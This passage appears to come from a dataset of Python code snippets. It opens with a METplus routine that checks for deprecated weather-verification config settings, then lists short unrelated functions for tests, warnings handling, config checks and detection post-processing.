{'sec' : 'config', 'alt' : 'LOOP_ORDER'},\n 'PREPBUFR_DIR_REGEX' : {'sec' : 'regex_pattern', 'alt' : None},\n 'PREPBUFR_FILE_REGEX' : {'sec' : 'regex_pattern', 'alt' : None},\n 'OBS_INPUT_DIR_REGEX' : {'sec' : 'regex_pattern', 'alt' : 'OBS_POINT_STAT_INPUT_DIR', 'copy': False},\n 'FCST_INPUT_DIR_REGEX' : {'sec' : 'regex_pattern', 'alt' : 'FCST_POINT_STAT_INPUT_DIR', 'copy': False},\n 'FCST_INPUT_FILE_REGEX' :\n {'sec' : 'regex_pattern', 'alt' : 'FCST_POINT_STAT_INPUT_TEMPLATE', 'copy': False},\n 'OBS_INPUT_FILE_REGEX' : {'sec' : 'regex_pattern', 'alt' : 'OBS_POINT_STAT_INPUT_TEMPLATE', 'copy': False},\n 'PREPBUFR_DATA_DIR' : {'sec' : 'dir', 'alt' : 'PB2NC_INPUT_DIR'},\n 'PREPBUFR_MODEL_DIR_NAME' : {'sec' : 'dir', 'alt' : 'PB2NC_INPUT_DIR', 'copy': False},\n 'OBS_INPUT_FILE_TMPL' :\n {'sec' : 'filename_templates', 'alt' : 'OBS_POINT_STAT_INPUT_TEMPLATE'},\n 'FCST_INPUT_FILE_TMPL' :\n {'sec' : 'filename_templates', 'alt' : 'FCST_POINT_STAT_INPUT_TEMPLATE'},\n 'NC_FILE_TMPL' : {'sec' : 'filename_templates', 'alt' : 'PB2NC_OUTPUT_TEMPLATE'},\n 'FCST_INPUT_DIR' : {'sec' : 'dir', 'alt' : 'FCST_POINT_STAT_INPUT_DIR'},\n 'OBS_INPUT_DIR' : {'sec' : 'dir', 'alt' : 'OBS_POINT_STAT_INPUT_DIR'},\n 'REGRID_TO_GRID' : {'sec' : 'config', 'alt' : 'POINT_STAT_REGRID_TO_GRID'},\n 'FCST_HR_START' : {'sec' : 'config', 'alt' : 'LEAD_SEQ', 'copy': False},\n 'FCST_HR_END' : {'sec' : 'config', 'alt' : 'LEAD_SEQ', 'copy': False},\n 'FCST_HR_INTERVAL' : {'sec' : 'config', 'alt' : 'LEAD_SEQ', 'copy': False},\n 'START_DATE' : {'sec' : 'config', 'alt' : 'INIT_BEG or VALID_BEG', 'copy': False},\n 'END_DATE' : {'sec' : 'config', 'alt' : 'INIT_END or VALID_END', 'copy': False},\n 'INTERVAL_TIME' : {'sec' : 'config', 'alt' : 'INIT_INCREMENT or VALID_INCREMENT', 'copy': False},\n 'BEG_TIME' : {'sec' : 'config', 'alt' : 'INIT_BEG or VALID_BEG', 'copy': False},\n 'END_TIME' : {'sec' : 'config', 'alt' : 'INIT_END or VALID_END', 'copy': False},\n 'START_HOUR' : {'sec' : 'config', 'alt' : 'INIT_BEG or VALID_BEG', 'copy': False},\n 'END_HOUR' : {'sec' : 'config', 'alt' : 'INIT_END or VALID_END', 'copy': False},\n 'OBS_BUFR_VAR_LIST' : {'sec' : 'config', 'alt' : 'PB2NC_OBS_BUFR_VAR_LIST'},\n 'TIME_SUMMARY_FLAG' : {'sec' : 'config', 'alt' : 'PB2NC_TIME_SUMMARY_FLAG'},\n 'TIME_SUMMARY_BEG' : {'sec' : 'config', 'alt' : 'PB2NC_TIME_SUMMARY_BEG'},\n 'TIME_SUMMARY_END' : {'sec' : 'config', 'alt' : 'PB2NC_TIME_SUMMARY_END'},\n 'TIME_SUMMARY_VAR_NAMES' : {'sec' : 'config', 'alt' : 'PB2NC_TIME_SUMMARY_VAR_NAMES'},\n 'TIME_SUMMARY_TYPE' : {'sec' : 'config', 'alt' : 'PB2NC_TIME_SUMMARY_TYPE'},\n 'OVERWRITE_NC_OUTPUT' : {'sec' : 'config', 'alt' : 'PB2NC_SKIP_IF_OUTPUT_EXISTS', 'copy': False},\n 'VERTICAL_LOCATION' : {'sec' : 'config', 'alt' : 'PB2NC_VERTICAL_LOCATION'},\n 'VERIFICATION_GRID' : {'sec' : 'config', 'alt' : 'REGRID_DATA_PLANE_VERIF_GRID'},\n 'WINDOW_RANGE_BEG' : {'sec' : 'config', 'alt' : 'OBS_WINDOW_BEGIN'},\n 'WINDOW_RANGE_END' : {'sec' : 'config', 'alt' : 'OBS_WINDOW_END'},\n 'OBS_EXACT_VALID_TIME' :\n {'sec' : 'config', 'alt' : 'OBS_WINDOW_BEGIN and OBS_WINDOW_END', 'copy': False},\n 'FCST_EXACT_VALID_TIME' :\n {'sec' : 'config', 'alt' : 'FCST_WINDOW_BEGIN and FCST_WINDOW_END', 'copy': False},\n 'PCP_COMBINE_METHOD' :\n {'sec' : 'config', 'alt' : 'FCST_PCP_COMBINE_METHOD and/or OBS_PCP_COMBINE_METHOD', 'copy': False},\n 'FHR_BEG' : {'sec' : 'config', 'alt' : 'LEAD_SEQ', 'copy': False},\n 'FHR_END' : {'sec' : 'config', 'alt' : 'LEAD_SEQ', 'copy': False},\n 'FHR_INC' : {'sec' : 'config', 'alt' : 'LEAD_SEQ', 'copy': False},\n 'FHR_GROUP_BEG' : {'sec' : 'config', 'alt' : 'LEAD_SEQ_[N]', 'copy': False},\n 'FHR_GROUP_END' : {'sec' : 'config', 'alt' : 'LEAD_SEQ_[N]', 'copy': False},\n 'FHR_GROUP_LABELS' : {'sec' : 'config', 'alt' : 'LEAD_SEQ_[N]_LABEL', 'copy': False},\n 'CYCLONE_OUT_DIR' : {'sec' : 'dir', 'alt' : 'CYCLONE_OUTPUT_DIR'},\n 'ENSEMBLE_STAT_OUT_DIR' : {'sec' : 'dir', 'alt' : 'ENSEMBLE_STAT_OUTPUT_DIR'},\n 'EXTRACT_OUT_DIR' : {'sec' : 'dir', 'alt' : 'EXTRACT_TILES_OUTPUT_DIR'},\n 'GRID_STAT_OUT_DIR' : {'sec' : 'dir', 'alt' : 'GRID_STAT_OUTPUT_DIR'},\n 'MODE_OUT_DIR' : {'sec' : 'dir', 'alt' : 'MODE_OUTPUT_DIR'},\n 'MTD_OUT_DIR' : {'sec' : 'dir', 'alt' : 'MTD_OUTPUT_DIR'},\n 'SERIES_INIT_OUT_DIR' : {'sec' : 'dir', 'alt' : 'SERIES_ANALYSIS_OUTPUT_DIR'},\n 'SERIES_LEAD_OUT_DIR' : {'sec' : 'dir', 'alt' : 'SERIES_ANALYSIS_OUTPUT_DIR'},\n 'SERIES_INIT_FILTERED_OUT_DIR' :\n {'sec' : 'dir', 'alt' : 'SERIES_ANALYSIS_FILTERED_OUTPUT_DIR'},\n 'SERIES_LEAD_FILTERED_OUT_DIR' :\n {'sec' : 'dir', 'alt' : 'SERIES_ANALYSIS_FILTERED_OUTPUT_DIR'},\n 'STAT_ANALYSIS_OUT_DIR' :\n {'sec' : 'dir', 'alt' : 'STAT_ANALYSIS_OUTPUT_DIR'},\n 'TCMPR_PLOT_OUT_DIR' : {'sec' : 'dir', 'alt' : 'TCMPR_PLOT_OUTPUT_DIR'},\n 'FCST_MIN_FORECAST' : {'sec' : 'config', 'alt' : 'LEAD_SEQ_MIN'},\n 'FCST_MAX_FORECAST' : {'sec' : 'config', 'alt' : 'LEAD_SEQ_MAX'},\n 'OBS_MIN_FORECAST' : {'sec' : 'config', 'alt' : 'OBS_PCP_COMBINE_MIN_LEAD'},\n 'OBS_MAX_FORECAST' : {'sec' : 'config', 'alt' : 'OBS_PCP_COMBINE_MAX_LEAD'},\n 'FCST_INIT_INTERVAL' : {'sec' : 'config', 'alt' : None},\n 'OBS_INIT_INTERVAL' : {'sec' : 'config', 'alt' : None},\n 'FCST_DATA_INTERVAL' : {'sec' : '', 'alt' : 'FCST_PCP_COMBINE_DATA_INTERVAL'},\n 'OBS_DATA_INTERVAL' : {'sec' : '', 'alt' : 'OBS_PCP_COMBINE_DATA_INTERVAL'},\n 'FCST_IS_DAILY_FILE' : {'sec' : '', 'alt' : 'FCST_PCP_COMBINE_IS_DAILY_FILE'},\n 'OBS_IS_DAILY_FILE' : {'sec' : '', 'alt' : 'OBS_PCP_COMBINE_IS_DAILY_FILE'},\n 'FCST_TIMES_PER_FILE' : {'sec' : '', 'alt' : 'FCST_PCP_COMBINE_TIMES_PER_FILE'},\n 'OBS_TIMES_PER_FILE' : {'sec' : '', 'alt' : 'OBS_PCP_COMBINE_TIMES_PER_FILE'},\n 'FCST_LEVEL' : {'sec' : '', 'alt' : 'FCST_PCP_COMBINE_INPUT_ACCUMS', 'copy': False},\n 'OBS_LEVEL' : {'sec' : '', 'alt' : 'OBS_PCP_COMBINE_INPUT_ACCUMS', 'copy': False},\n 'MODE_FCST_CONV_RADIUS' : {'sec' : 'config', 'alt' : 'FCST_MODE_CONV_RADIUS'},\n 'MODE_FCST_CONV_THRESH' : {'sec' : 'config', 'alt' : 'FCST_MODE_CONV_THRESH'},\n 'MODE_FCST_MERGE_FLAG' : {'sec' : 'config', 'alt' : 'FCST_MODE_MERGE_FLAG'},\n 'MODE_FCST_MERGE_THRESH' : {'sec' : 'config', 'alt' : 'FCST_MODE_MERGE_THRESH'},\n 'MODE_OBS_CONV_RADIUS' : {'sec' : 'config', 'alt' : 'OBS_MODE_CONV_RADIUS'},\n 'MODE_OBS_CONV_THRESH' : {'sec' : 'config', 'alt' : 'OBS_MODE_CONV_THRESH'},\n 'MODE_OBS_MERGE_FLAG' : {'sec' : 'config', 'alt' : 'OBS_MODE_MERGE_FLAG'},\n 'MODE_OBS_MERGE_THRESH' : {'sec' : 'config', 'alt' : 'OBS_MODE_MERGE_THRESH'},\n 'MTD_FCST_CONV_RADIUS' : {'sec' : 'config', 'alt' : 'FCST_MTD_CONV_RADIUS'},\n 'MTD_FCST_CONV_THRESH' : {'sec' : 'config', 'alt' : 'FCST_MTD_CONV_THRESH'},\n 'MTD_OBS_CONV_RADIUS' : {'sec' : 'config', 'alt' : 'OBS_MTD_CONV_RADIUS'},\n 'MTD_OBS_CONV_THRESH' : {'sec' : 'config', 'alt' : 'OBS_MTD_CONV_THRESH'},\n 'RM_EXE' : {'sec' : 'exe', 'alt' : 'RM'},\n 'CUT_EXE' : {'sec' : 'exe', 'alt' : 'CUT'},\n 'TR_EXE' : {'sec' : 'exe', 'alt' : 'TR'},\n 'NCAP2_EXE' : {'sec' : 'exe', 'alt' : 'NCAP2'},\n 'CONVERT_EXE' : {'sec' : 'exe', 'alt' : 'CONVERT'},\n 'NCDUMP_EXE' : {'sec' : 'exe', 'alt' : 'NCDUMP'},\n 'EGREP_EXE' : {'sec' : 'exe', 'alt' : 'EGREP'},\n 'ADECK_TRACK_DATA_DIR' : {'sec' : 'dir', 'alt' : 'TC_PAIRS_ADECK_INPUT_DIR'},\n 'BDECK_TRACK_DATA_DIR' : {'sec' : 'dir', 'alt' : 'TC_PAIRS_BDECK_INPUT_DIR'},\n 'MISSING_VAL_TO_REPLACE' : {'sec' : 'config', 'alt' : 'TC_PAIRS_MISSING_VAL_TO_REPLACE'},\n 'MISSING_VAL' : {'sec' : 'config', 'alt' : 'TC_PAIRS_MISSING_VAL'},\n 'TRACK_DATA_SUBDIR_MOD' : {'sec' : 'dir', 'alt' : None},\n 'ADECK_FILE_PREFIX' : {'sec' : 'config', 'alt' : 'TC_PAIRS_ADECK_TEMPLATE', 'copy': False},\n 'BDECK_FILE_PREFIX' : {'sec' : 'config', 'alt' : 'TC_PAIRS_BDECK_TEMPLATE', 'copy': False},\n 'TOP_LEVEL_DIRS' : {'sec' : 'config', 'alt' : 'TC_PAIRS_READ_ALL_FILES'},\n 'TC_PAIRS_DIR' : {'sec' : 'dir', 'alt' : 'TC_PAIRS_OUTPUT_DIR'},\n 'CYCLONE' : {'sec' : 'config', 'alt' : 'TC_PAIRS_CYCLONE'},\n 'STORM_ID' : {'sec' : 'config', 'alt' : 'TC_PAIRS_STORM_ID'},\n 'BASIN' : {'sec' : 'config', 'alt' : 'TC_PAIRS_BASIN'},\n 'STORM_NAME' : {'sec' : 'config', 'alt' : 'TC_PAIRS_STORM_NAME'},\n 'DLAND_FILE' : {'sec' : 'config', 'alt' : 'TC_PAIRS_DLAND_FILE'},\n 'TRACK_TYPE' : {'sec' : 'config', 'alt' : 'TC_PAIRS_REFORMAT_DECK'},\n 'FORECAST_TMPL' : {'sec' : 'filename_templates', 'alt' : 'TC_PAIRS_ADECK_TEMPLATE'},\n 'REFERENCE_TMPL' : {'sec' : 'filename_templates', 'alt' : 'TC_PAIRS_BDECK_TEMPLATE'},\n 'TRACK_DATA_MOD_FORCE_OVERWRITE' :\n {'sec' : 'config', 'alt' : 'TC_PAIRS_SKIP_IF_REFORMAT_EXISTS', 'copy': False},\n 'TC_PAIRS_FORCE_OVERWRITE' : {'sec' : 'config', 'alt' : 'TC_PAIRS_SKIP_IF_OUTPUT_EXISTS', 'copy': False},\n 'GRID_STAT_CONFIG' : {'sec' : 'config', 'alt' : 'GRID_STAT_CONFIG_FILE'},\n 'MODE_CONFIG' : {'sec' : 'config', 'alt': 'MODE_CONFIG_FILE'},\n 'FCST_PCP_COMBINE_INPUT_LEVEL': {'sec': 'config', 'alt' : 'FCST_PCP_COMBINE_INPUT_ACCUMS'},\n 'OBS_PCP_COMBINE_INPUT_LEVEL': {'sec': 'config', 'alt' : 'OBS_PCP_COMBINE_INPUT_ACCUMS'},\n 'TIME_METHOD': {'sec': 'config', 'alt': 'LOOP_BY', 'copy': False},\n 'MODEL_DATA_DIR': {'sec': 'dir', 'alt': 'EXTRACT_TILES_GRID_INPUT_DIR'},\n 'STAT_LIST': {'sec': 'config', 'alt': 'SERIES_ANALYSIS_STAT_LIST'},\n 'NLAT': {'sec': 'config', 'alt': 'EXTRACT_TILES_NLAT'},\n 'NLON': {'sec': 'config', 'alt': 'EXTRACT_TILES_NLON'},\n 'DLAT': {'sec': 'config', 'alt': 'EXTRACT_TILES_DLAT'},\n 'DLON': {'sec': 'config', 'alt': 'EXTRACT_TILES_DLON'},\n 'LON_ADJ': {'sec': 'config', 'alt': 'EXTRACT_TILES_LON_ADJ'},\n 'LAT_ADJ': {'sec': 'config', 'alt': 'EXTRACT_TILES_LAT_ADJ'},\n 'OVERWRITE_TRACK': {'sec': 'config', 'alt': 'EXTRACT_TILES_OVERWRITE_TRACK'},\n 'BACKGROUND_MAP': {'sec': 'config', 'alt': 'SERIES_ANALYSIS_BACKGROUND_MAP'},\n 'GFS_FCST_FILE_TMPL': {'sec': 'filename_templates', 'alt': 'FCST_EXTRACT_TILES_INPUT_TEMPLATE'},\n 'GFS_ANLY_FILE_TMPL': {'sec': 'filename_templates', 'alt': 'OBS_EXTRACT_TILES_INPUT_TEMPLATE'},\n 'SERIES_BY_LEAD_FILTERED_OUTPUT_DIR': {'sec': 'dir', 'alt': 'SERIES_ANALYSIS_FILTERED_OUTPUT_DIR'},\n 'SERIES_BY_INIT_FILTERED_OUTPUT_DIR': {'sec': 'dir', 'alt': 'SERIES_ANALYSIS_FILTERED_OUTPUT_DIR'},\n 'SERIES_BY_LEAD_OUTPUT_DIR': {'sec': 'dir', 'alt': 'SERIES_ANALYSIS_OUTPUT_DIR'},\n 'SERIES_BY_INIT_OUTPUT_DIR': {'sec': 'dir', 'alt': 'SERIES_ANALYSIS_OUTPUT_DIR'},\n 'SERIES_BY_LEAD_GROUP_FCSTS': {'sec': 'config', 'alt': 'SERIES_ANALYSIS_GROUP_FCSTS'},\n 'SERIES_ANALYSIS_BY_LEAD_CONFIG_FILE': {'sec': 'config', 'alt': 'SERIES_ANALYSIS_CONFIG_FILE'},\n 'SERIES_ANALYSIS_BY_INIT_CONFIG_FILE': {'sec': 'config', 'alt': 'SERIES_ANALYSIS_CONFIG_FILE'},\n 'ENSEMBLE_STAT_MET_OBS_ERROR_TABLE': {'sec': 'config', 'alt': 'ENSEMBLE_STAT_MET_OBS_ERR_TABLE'},\n 'VAR_LIST': {'sec': 'config', 'alt': 'BOTH_VAR<n>_NAME BOTH_VAR<n>_LEVELS or SERIES_ANALYSIS_VAR_LIST', 'copy': False},\n 'SERIES_ANALYSIS_VAR_LIST': {'sec': 'config', 'alt': 'BOTH_VAR<n>_NAME BOTH_VAR<n>_LEVELS', 'copy': False},\n 'EXTRACT_TILES_VAR_LIST': {'sec': 'config', 'alt': ''},\n 'STAT_ANALYSIS_LOOKIN_DIR': {'sec': 'dir', 'alt': 'MODEL1_STAT_ANALYSIS_LOOKIN_DIR'},\n 'VALID_HOUR_METHOD': {'sec': 'config', 'alt': None},\n 'VALID_HOUR_BEG': {'sec': 'config', 'alt': None},\n 'VALID_HOUR_END': {'sec': 'config', 'alt': None},\n 'VALID_HOUR_INCREMENT': {'sec': 'config', 'alt': None},\n 'INIT_HOUR_METHOD': {'sec': 'config', 'alt': None},\n 'INIT_HOUR_BEG': {'sec': 'config', 'alt': None},\n 'INIT_HOUR_END': {'sec': 'config', 'alt': None},\n 'INIT_HOUR_INCREMENT': {'sec': 'config', 'alt': None},\n 'STAT_ANALYSIS_CONFIG': {'sec': 'config', 'alt': 'STAT_ANALYSIS_CONFIG_FILE'},\n 'JOB_NAME': {'sec': 'config', 'alt': 'STAT_ANALYSIS_JOB_NAME'},\n 'JOB_ARGS': {'sec': 'config', 'alt': 'STAT_ANALYSIS_JOB_ARGS'},\n 'FCST_LEAD': {'sec': 'config', 'alt': 'FCST_LEAD_LIST'},\n 'FCST_VAR_NAME': {'sec': 'config', 'alt': 'FCST_VAR_LIST'},\n 'FCST_VAR_LEVEL': {'sec': 'config', 'alt': 'FCST_VAR_LEVEL_LIST'},\n 'OBS_VAR_NAME': {'sec': 'config', 'alt': 'OBS_VAR_LIST'},\n 'OBS_VAR_LEVEL': {'sec': 'config', 'alt': 'OBS_VAR_LEVEL_LIST'},\n 'REGION': {'sec': 'config', 'alt': 'VX_MASK_LIST'},\n 'INTERP': {'sec': 'config', 'alt': 'INTERP_LIST'},\n 'INTERP_PTS': {'sec': 'config', 'alt': 'INTERP_PTS_LIST'},\n 'CONV_THRESH': {'sec': 'config', 'alt': 'CONV_THRESH_LIST'},\n 'FCST_THRESH': {'sec': 'config', 'alt': 'FCST_THRESH_LIST'},\n 'LINE_TYPE': {'sec': 'config', 'alt': 'LINE_TYPE_LIST'},\n 'STAT_ANALYSIS_DUMP_ROW_TMPL': {'sec': 'filename_templates', 'alt': 'STAT_ANALYSIS_DUMP_ROW_TEMPLATE'},\n 'STAT_ANALYSIS_OUT_STAT_TMPL': {'sec': 'filename_templates', 'alt': 'STAT_ANALYSIS_OUT_STAT_TEMPLATE'},\n 'PLOTTING_SCRIPTS_DIR': {'sec': 'dir', 'alt': 'MAKE_PLOTS_SCRIPTS_DIR'},\n 'STAT_FILES_INPUT_DIR': {'sec': 'dir', 'alt': 'MAKE_PLOTS_INPUT_DIR'},\n 'PLOTTING_OUTPUT_DIR': {'sec': 'dir', 'alt': 'MAKE_PLOTS_OUTPUT_DIR'},\n 'VERIF_CASE': {'sec': 'config', 'alt': 'MAKE_PLOTS_VERIF_CASE'},\n 'VERIF_TYPE': {'sec': 'config', 'alt': 'MAKE_PLOTS_VERIF_TYPE'},\n 'PLOT_TIME': {'sec': 'config', 'alt': 'DATE_TIME'},\n 'MODEL<n>_NAME': {'sec': 'config', 'alt': 'MODEL<n>'},\n 'MODEL<n>_OBS_NAME': {'sec': 'config', 'alt': 'MODEL<n>_OBTYPE'},\n 'MODEL<n>_STAT_DIR': {'sec': 'dir', 'alt': 'MODEL<n>_STAT_ANALYSIS_LOOKIN_DIR'},\n 'MODEL<n>_NAME_ON_PLOT': {'sec': 'config', 'alt': 'MODEL<n>_REFERENCE_NAME'},\n 'REGION_LIST': {'sec': 'config', 'alt': 'VX_MASK_LIST'},\n 'PLOT_STATS_LIST': {'sec': 'config', 'alt': 'MAKE_PLOT_STATS_LIST'},\n 'CI_METHOD': {'sec': 'config', 'alt': 'MAKE_PLOTS_CI_METHOD'},\n 'VERIF_GRID': {'sec': 'config', 'alt': 'MAKE_PLOTS_VERIF_GRID'},\n 'EVENT_EQUALIZATION': {'sec': 'config', 'alt': 'MAKE_PLOTS_EVENT_EQUALIZATION'},\n 'MTD_CONFIG': {'sec': 'config', 'alt': 'MTD_CONFIG_FILE'},\n 'CLIMO_GRID_STAT_INPUT_DIR': {'sec': 'dir', 'alt': 'GRID_STAT_CLIMO_MEAN_INPUT_DIR'},\n 'CLIMO_GRID_STAT_INPUT_TEMPLATE': {'sec': 'filename_templates', 'alt': 'GRID_STAT_CLIMO_MEAN_INPUT_TEMPLATE'},\n 'CLIMO_POINT_STAT_INPUT_DIR': {'sec': 'dir', 'alt': 'POINT_STAT_CLIMO_MEAN_INPUT_DIR'},\n 'CLIMO_POINT_STAT_INPUT_TEMPLATE': {'sec': 'filename_templates', 'alt': 'POINT_STAT_CLIMO_MEAN_INPUT_TEMPLATE'},\n 'GEMPAKTOCF_CLASSPATH': {'sec': 'exe', 'alt': 'GEMPAKTOCF_JAR', 'copy': False},\n 'CUSTOM_INGEST_<n>_OUTPUT_DIR': {'sec': 'dir', 'alt': 'PY_EMBED_INGEST_<n>_OUTPUT_DIR'},\n 'CUSTOM_INGEST_<n>_OUTPUT_TEMPLATE': {'sec': 'filename_templates', 'alt': 'PY_EMBED_INGEST_<n>_OUTPUT_TEMPLATE'},\n 'CUSTOM_INGEST_<n>_OUTPUT_GRID': {'sec': 'config', 'alt': 'PY_EMBED_INGEST_<n>_OUTPUT_GRID'},\n 'CUSTOM_INGEST_<n>_SCRIPT': {'sec': 'config', 'alt': 'PY_EMBED_INGEST_<n>_SCRIPT'},\n 'CUSTOM_INGEST_<n>_TYPE': {'sec': 'config', 'alt': 'PY_EMBED_INGEST_<n>_TYPE'},\n 'TC_STAT_RUN_VIA': {'sec': 'config', 'alt': 'TC_STAT_CONFIG_FILE',\n 'copy': False},\n 'TC_STAT_CMD_LINE_JOB': {'sec': 'config', 'alt': 'TC_STAT_JOB_ARGS'},\n 'TC_STAT_JOBS_LIST': {'sec': 'config', 'alt': 'TC_STAT_JOB_ARGS'},\n 'EXTRACT_TILES_OVERWRITE_TRACK': {'sec': 'config',\n 'alt': 'EXTRACT_TILES_SKIP_IF_OUTPUT_EXISTS',\n 'copy': False},\n 'EXTRACT_TILES_PAIRS_INPUT_DIR': {'sec': 'dir',\n 'alt': 'EXTRACT_TILES_STAT_INPUT_DIR',\n 'copy': False},\n 'EXTRACT_TILES_FILTERED_OUTPUT_TEMPLATE': {'sec': 'filename_template',\n 'alt': 'EXTRACT_TILES_STAT_INPUT_TEMPLATE',},\n 'EXTRACT_TILES_GRID_INPUT_DIR': {'sec': 'dir',\n 'alt': 'FCST_EXTRACT_TILES_INPUT_DIR'\n 'and '\n 'OBS_EXTRACT_TILES_INPUT_DIR',\n 'copy': False},\n 'SERIES_ANALYSIS_FILTER_OPTS': {'sec': 'config',\n 'alt': 'TC_STAT_JOB_ARGS',\n 'copy': False},\n 'SERIES_ANALYSIS_INPUT_DIR': {'sec': 'dir',\n 'alt': 'FCST_SERIES_ANALYSIS_INPUT_DIR '\n 'and '\n 'OBS_SERIES_ANALYSIS_INPUT_DIR'},\n 'FCST_SERIES_ANALYSIS_TILE_INPUT_TEMPLATE': {'sec': 'filename_templates',\n 'alt': 'FCST_SERIES_ANALYSIS_INPUT_TEMPLATE '},\n 'OBS_SERIES_ANALYSIS_TILE_INPUT_TEMPLATE': {'sec': 'filename_templates',\n 'alt': 'OBS_SERIES_ANALYSIS_INPUT_TEMPLATE '},\n 'EXTRACT_TILES_STAT_INPUT_DIR': {'sec': 'dir',\n 'alt': 'EXTRACT_TILES_TC_STAT_INPUT_DIR',},\n 'EXTRACT_TILES_STAT_INPUT_TEMPLATE': {'sec': 'filename_templates',\n 'alt': 'EXTRACT_TILES_TC_STAT_INPUT_TEMPLATE',},\n 'SERIES_ANALYSIS_STAT_INPUT_DIR': {'sec': 'dir',\n 'alt': 'SERIES_ANALYSIS_TC_STAT_INPUT_DIR', },\n 'SERIES_ANALYSIS_STAT_INPUT_TEMPLATE': {'sec': 'filename_templates',\n 'alt': 'SERIES_ANALYSIS_TC_STAT_INPUT_TEMPLATE', },\n }\n\n # template '' : {'sec' : '', 'alt' : '', 'copy': True},\n\n logger = config.logger\n\n # create list of errors and warnings to report for deprecated configs\n e_list = []\n w_list = []\n all_sed_cmds = []\n\n for old, depr_info in deprecated_dict.items():\n if isinstance(depr_info, dict):\n\n # check if <n> is found in the old item, use regex to find variables if found\n if '<n>' in old:\n old_regex = old.replace('<n>', r'(\\d+)')\n indices = find_indices_in_config_section(old_regex,\n config,\n index_index=1).keys()\n for index in indices:\n old_with_index = old.replace('<n>', index)\n if depr_info['alt']:\n alt_with_index = depr_info['alt'].replace('<n>', index)\n else:\n alt_with_index = ''\n\n handle_deprecated(old_with_index, alt_with_index, depr_info,\n config, all_sed_cmds, w_list, e_list)\n else:\n handle_deprecated(old, depr_info['alt'], depr_info,\n config, all_sed_cmds, w_list, e_list)\n\n\n # check all templates and error if any deprecated tags are used\n # value of dict is replacement tag, set to None if no replacement exists\n # deprecated tags: region (replace with basin)\n deprecated_tags = {'region' : 'basin'}\n template_vars = config.keys('config')\n template_vars = [tvar for tvar in template_vars if tvar.endswith('_TEMPLATE')]\n for temp_var in template_vars:\n template = config.getraw('filename_templates', temp_var)\n tags = get_tags(template)\n\n for depr_tag, replace_tag in deprecated_tags.items():\n if depr_tag in tags:\n e_msg = 'Deprecated tag {{{}}} found in {}.'.format(depr_tag,\n temp_var)\n if replace_tag is not None:\n e_msg += ' Replace with {{{}}}'.format(replace_tag)\n\n e_list.append(e_msg)\n\n # if any warning exist, report them\n if w_list:\n for warning_msg in w_list:\n logger.warning(warning_msg)\n\n # if any errors exist, report them and exit\n if e_list:\n logger.error('DEPRECATED CONFIG ITEMS WERE FOUND. ' +\\\n 'PLEASE REMOVE/REPLACE THEM FROM CONFIG FILES')\n for error_msg in e_list:\n logger.error(error_msg)\n return False, all_sed_cmds\n\n return True, []", "def ignores(self):\n pass # make ignore_tags unaccessible", "def _should_profile_production_default():\n return False", "def test_missing_settings(monkeypatch) -> None: # noqa: TYP001\n monkeypatch.delattr(django_settings, 'SWAGGER_TESTER')\n SwaggerTesterSettings()", "def test_exclude_include_overlapping_resolved_with_include_for_configitem():\n\n @mc_config(ef, load_now=True)\n def config(rt):\n with ItemWithAA() as cr:\n cr.aa = 1\n with item(mc_include=[g_dev12, pp, dev2], mc_exclude=[g_dev23]) as it:\n it.setattr('anattr', pp=1, g_dev12_3=2)\n it.setattr('b', pp=1, dev2=0)\n it.setattr('anotherattr', default=111)\n return cr\n\n cr = config(prod).ItemWithAA\n assert not cr.item\n assert compare_json(cr, _include_exclude_for_configitem_expected_json, test_excluded=True)\n\n cr = config(dev1).ItemWithAA\n assert cr.item\n\n cr = config(dev2).ItemWithAA\n assert cr.item\n assert cr.item.b == 0\n\n cr = config(dev3).ItemWithAA\n assert not cr.item\n\n cr = config(pp).ItemWithAA\n assert cr.item\n assert cr.item.anattr == 1\n assert cr.item.b == 1\n assert cr.item.anotherattr == 111", "def _enabled_warnings(self):\n with warnings.catch_warnings():\n if self.warnings:\n # if self.warnings is set, use it to filter all the warnings\n warnings.simplefilter(self.warnings)\n # if the filter is 'default' or 'always', special-case the\n # warnings from the deprecated unittest methods to show them\n # no more than once per module, because they can be fairly\n # noisy. The -Wd and -Wa flags can be used to bypass this\n # only when self.warnings is None.\n if self.warnings in ['default', 'always']:\n warnings.filterwarnings(\n 'module',\n category=DeprecationWarning,\n message=r'Please use assert\\w+ instead.')\n yield", "def configure(self, conf):\n return False", "def test_allow(self, excl, value):\n e = exclude(*excl)\n assert e(fields(C).a, value) is True", "def check_configuration(self):\n self.ensure_one()\n getattr(self, '%s_check_configuration' % self.provider, lambda: None)()", "def _should_ignore_module(cls, module_name):\n # exclude test modules for now to avoid spurious failures\n # TODO(jelle): enable for test modules too\n return module_name.split(\".\")[-1].startswith(\"test\")", "def skip_require():\n global ignore_once\n ignore_once = True", "def suppress(self):\n return self", "def test_hooks_falsy_by_default():\n config = util.read_config(\"some-nonexistant-path\")\n assert not config[\"pre_write\"]\n assert not config[\"post_write\"]", "def test_noop_hiding(self):\n cmdline = [\n \"starfish\",\n \"noop\",\n ]\n if cmdline[0] == 'starfish':\n coverage_cmdline = [\n \"coverage\", \"run\",\n \"-p\",\n \"--source\", \"starfish\",\n \"-m\", \"starfish.starfish\",\n ]\n coverage_cmdline.extend(cmdline[1:])\n cmdline = coverage_cmdline\n\n env = os.environ.copy()\n env[PROFILER_NOOP_ENVVAR] = \"\"\n subprocess.check_call(cmdline, env=env)\n\n with self.assertRaises(subprocess.CalledProcessError):\n subprocess.check_call(cmdline)", "def check_configs(self):\n\n pass", "def warn_default(version):\r\n if config.warn.ignore_bug_before == 'None':\r\n return True\r\n if config.warn.ignore_bug_before == 'all':\r\n return False\r\n if config.warn.ignore_bug_before >= version:\r\n return False\r\n return True", "def test_disable_enabled():\n config_info = read_config()\n config_info['enabled'] = False\n open(config_file, 'w').close()\n with open(config_file, 'r+') as conf:\n conf.write(json.dumps(config_info))\n config_info = read_config()\n\n assert config_info['enabled'] is False", "def _build_non_max_suppressor(type):\n\n if type == model_config.SSD:\n score_threshold = config.cfg.POSTPROCESSOR.SCORE_THRESHOLD\n iou_threshold = config.cfg.POSTPROCESSOR.IOU_THRESHOLD\n max_detections_per_class = config.cfg.POSTPROCESSOR.MAX_DETECTIONS_PER_CLASS\n max_total_detections = config.cfg.POSTPROCESSOR.MAX_TOTAL_DETECTIONS\n elif type == model_config.FASTER_RCNN:\n score_threshold = config.cfg.POSTPROCESSOR.SCORE_THRESHOLD\n iou_threshold = config.cfg.POSTPROCESSOR.IOU_THRESHOLD\n max_detections_per_class = config.cfg.POSTPROCESSOR.MAX_DETECTIONS_PER_CLASS\n max_total_detections = config.cfg.POSTPROCESSOR.MAX_TOTAL_DETECTIONS\n else:\n raise 